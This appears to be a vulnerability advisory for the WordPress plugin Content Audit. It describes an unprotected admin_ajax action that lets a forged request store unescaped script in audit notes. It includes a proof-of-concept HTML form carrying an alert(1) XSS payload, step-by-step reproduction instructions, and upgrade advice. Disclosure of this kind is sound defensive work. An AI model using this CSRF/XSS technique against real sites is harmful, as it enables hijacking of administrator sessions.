CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Score Vector Complexity Authentication Confidentiality Integrity Availability
5.8
Medium
Network Medium None Partial Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.

Proof of concept

  1. Install/activate the plugin
  2. Make sure you have a post with ID=2 (or edit the HTML provided below)
  3. Settings > Content Audit > select at least “Pages” for “Audited content types”
  4. Visit a page containing the below HTML
  5. Click submit
  6. Visit http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit">
 <input type="text" name="post_ids[]" value="2">
 <input type="text" name="_content_audit_owner" value="Elliot Alderson">
 <input type="text" name="_content_audit_expiration_date" value="2020-01-01">
 <input type="text" name="_content_audit_notes" value="&lt;script>alert(1)&lt;/script>">
 <input type="submit">
</form>

 

Mitigation/further actions

Upgrade to version 1.9.2 or later.